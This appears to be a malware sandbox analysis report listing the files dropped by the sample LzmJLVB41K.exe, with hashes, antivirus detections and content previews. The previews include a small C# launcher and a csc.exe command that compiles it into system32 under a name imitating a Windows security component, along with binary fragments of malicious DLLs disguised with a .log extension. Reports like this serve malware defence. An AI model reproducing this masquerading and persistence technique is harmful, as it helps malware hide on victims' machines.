                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oirijhak.0ct.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnbpvgyn.15c.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0vilnq0.5lm.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tggvybut.pco.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkfrggz1.nto.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyqij3iy.te1.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwpgxguf.tf3.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh132fem.q5k.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yohrjmad.p5w.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp2mm0jw.qos.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.0.cs

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):383
                                                                                                                Entropy (8bit):5.0067170727830765
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JwPL4SiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKm
                                                                                                                MD5:725583A6F5000085D27652E92951F0AB
                                                                                                                SHA1:DCCAB3BF4B4D475F42C81F4BFDC35CE1B5401979
                                                                                                                SHA-256:9BDCC344FFB112D8F7F11FF003F5800266EF4FA98686C3AC657D6DA1F187976B
                                                                                                                SHA-512:50C2D02AA3B334477E98FD247D7BE6846994A73960E9F1E363DB007B52AD9C452739911F5C4AA8567572409BCAFA87D13DB5318452A7D8CEB76983CF556E08AF
                                                                                                                Malicious:false
                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"); } catch { } }).Start();. }.}.

                                                                                                                C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):253
                                                                                                                Entropy (8bit):5.02491290278636
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fEC5dAWxn:Hu7L//TRq79cQnan5x
                                                                                                                MD5:91D68F214B584DA5FA865F2E9A8AE519
                                                                                                                SHA1:4181F2344C63C5D3C3D05FA9BE1B654397C22597
                                                                                                                SHA-256:D18B968C51EC172CB7729F4BD1F8B46A6918F3E15DCE6F396C03F626091C091E
                                                                                                                SHA-512:226186892CF4B36248058879CCE64A73FC8867BCB587D30F16BCD79B37E2C6AC86E98497CFF08A47EA54EE965A23F955AB0CD79A9F0A2050432179D77E8FBAED
                                                                                                                Malicious:false
                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.0.cs"

                                                                                                                C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.out

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (335), with CRLF, CR line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):756
                                                                                                                Entropy (8bit):5.22259242902613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:KO2z/I/u7L//TRq79cQnan5UKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOuI/un/Vq79tnaniKax5DqBVKVrdFAw
                                                                                                                MD5:028964768C2912658392AC236A10460E
                                                                                                                SHA1:FF631C10C22053BD64560F7780E7AD0E091F64C4
                                                                                                                SHA-256:34B914350E84D35AF797B3498855A8DCDABCB10C4AC1E95FA502BB51E7F5ED5A
                                                                                                                SHA-512:B8EDD85556344A5EDC56CDF5299100A55092470CD974311812DA9145A1BF9743B176DCB021CB2D4EFC1B6D9BB0B84BE557E330FAE9848FC2D3B81DE169671D34
                                                                                                                Malicious:false
                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                C:\Users\user\Desktop\4a1fa0b1809e35

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):182
                                                                                                                Entropy (8bit):5.6708538473130545
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:p1UgdQh0mbEn+B/lXVQbZSKcvne0FfvLtihdREHWTMqPnDRNEh7Ou2Oiul:wgd00K/ySKcvPBWEHVqPncTNl
                                                                                                                MD5:48EC5844D800C9FB05019CA09007888A
                                                                                                                SHA1:DDD51A293F83B2E716DD29B362D9DCDB8A6E2C39
                                                                                                                SHA-256:33CECCF70149959BAB039BBB70B75F28D5A11E5F6944E465F79CDA30DE18AF35
                                                                                                                SHA-512:3EA7773D197B4D789643DF7DE737110B1CB0C9307A61EBF3A2CED9190F675FB8F2B62A36AB990740D14662E20AA832B60DE2673217D248D5C436C93D21C22AB2
                                                                                                                Malicious:false
                                                                                                                Preview:3psVPqmVZP85DQNkXdyztaaxJ84uaeiu97DhSpfyjZaRKFrH7vhkwFbcP4LQv154rO5FNpRr79QU9JnEQwxo6784gkSXdPCrefj6Jm4Rd0mwyGcFRH99DQ8tQBimX4Ns6i0ejq4o2fKFULFaHMGWPDoNh0qHDR4jm4zQP8gkMVGhF2ZE6IfKy1

                                                                                                                C:\Users\user\Desktop\KlfRTWYv.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):85504
                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: T0jSGXdxX5.exe, Detection: malicious, Browse
                                                                                                                • Filename: s5duotgoYD.exe, Detection: malicious, Browse
                                                                                                                • Filename: main.exe, Detection: malicious, Browse
                                                                                                                • Filename: file_1443.exe, Detection: malicious, Browse
                                                                                                                • Filename: lsass.exe, Detection: malicious, Browse
                                                                                                                • Filename: t8xf0Y1ovi.exe, Detection: malicious, Browse
                                                                                                                • Filename: QMT2731i8k.exe, Detection: malicious, Browse
                                                                                                                • Filename: TGh6AUbQkh.exe, Detection: malicious, Browse
                                                                                                                • Filename: 2VaAObAYLP.exe, Detection: malicious, Browse
                                                                                                                • Filename: dvc2TBOZTh.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                C:\Users\user\Desktop\PYxQwTnj.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9728
                                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                                C:\Users\user\Desktop\QMBYhgjh.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32256
                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                C:\Users\user\Desktop\rUslzROg.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):46592
                                                                                                                Entropy (8bit):5.870612048031897
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                C:\Users\user\Desktop\yRglcgIV.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):23552
                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                C:\Users\user\Desktop\zxBbjKdN.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):69632
                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                C:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:MSVC .res
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1224
                                                                                                                Entropy (8bit):4.435108676655666
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                Malicious:false
